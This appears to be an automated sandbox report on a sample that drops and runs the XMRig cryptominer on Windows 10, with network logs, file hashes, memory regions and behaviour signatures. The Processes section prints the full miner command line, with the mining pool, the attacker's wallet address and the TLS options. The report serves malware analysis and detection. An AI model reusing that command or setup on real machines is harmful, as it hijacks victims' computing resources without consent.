| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 149.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.253.116.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2108-16-0x00000257F0970000-0x00000257F0990000-memory.dmp
memory/2108-17-0x00000257F09D0000-0x00000257F09F0000-memory.dmp
memory/2108-18-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-19-0x0000025884C60000-0x0000025884C80000-memory.dmp
memory/2108-20-0x0000025884C40000-0x0000025884C60000-memory.dmp
memory/2108-21-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-22-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-25-0x0000025884C40000-0x0000025884C60000-memory.dmp
memory/2108-24-0x0000025884C60000-0x0000025884C80000-memory.dmp
memory/2108-23-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-26-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-27-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-28-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-29-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-30-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-31-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-32-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-33-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-34-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-35-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-36-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-37-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-38-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-39-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-40-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-41-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-42-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-43-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-44-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-45-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-46-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-47-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-48-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-49-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-50-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-51-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-52-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-53-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-54-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-55-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-56-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-57-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-58-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-59-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-60-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-61-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-62-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-63-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-64-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-65-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-66-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-67-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-68-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-69-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-70-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-71-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-72-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-73-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-74-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-75-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-76-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-77-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-78-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-79-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-80-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-81-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-82-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-83-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-84-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240508-en
Max time kernel
1797s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4852 wrote to memory of 3964 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4852 wrote to memory of 3964 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4276,i,2607710392823067546,4648797561512801463,262144 --variations-seed-version --mojo-platform-channel-handle=4456 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3716,i,2607710392823067546,4648797561512801463,262144 --variations-seed-version --mojo-platform-channel-handle=3996 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.173.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3964-16-0x000001E1218E0000-0x000001E121900000-memory.dmp
memory/3964-17-0x000001E121920000-0x000001E121940000-memory.dmp
memory/3964-18-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-20-0x000001E121940000-0x000001E121960000-memory.dmp
memory/3964-21-0x000001E121960000-0x000001E121980000-memory.dmp
memory/3964-19-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-22-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-23-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-24-0x000001E121940000-0x000001E121960000-memory.dmp
memory/3964-25-0x000001E121960000-0x000001E121980000-memory.dmp
memory/3964-26-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-27-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-28-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-29-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-30-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-31-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-32-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-33-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-34-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-35-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-36-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-37-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-38-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-39-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-40-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-41-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-42-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-43-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-44-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-45-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-46-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-47-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-48-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-49-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-50-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-51-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-52-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-53-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-54-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-55-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-56-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-57-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-58-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-59-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-60-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-61-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-62-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-63-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-64-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-65-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-66-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-67-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-68-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-69-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-70-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-71-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-72-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-73-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-74-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-75-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-76-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-77-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-78-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-79-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-80-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-81-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-82-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-83-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
memory/3964-84-0x00007FF6C0AB0000-0x00007FF6C15B3000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:02
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
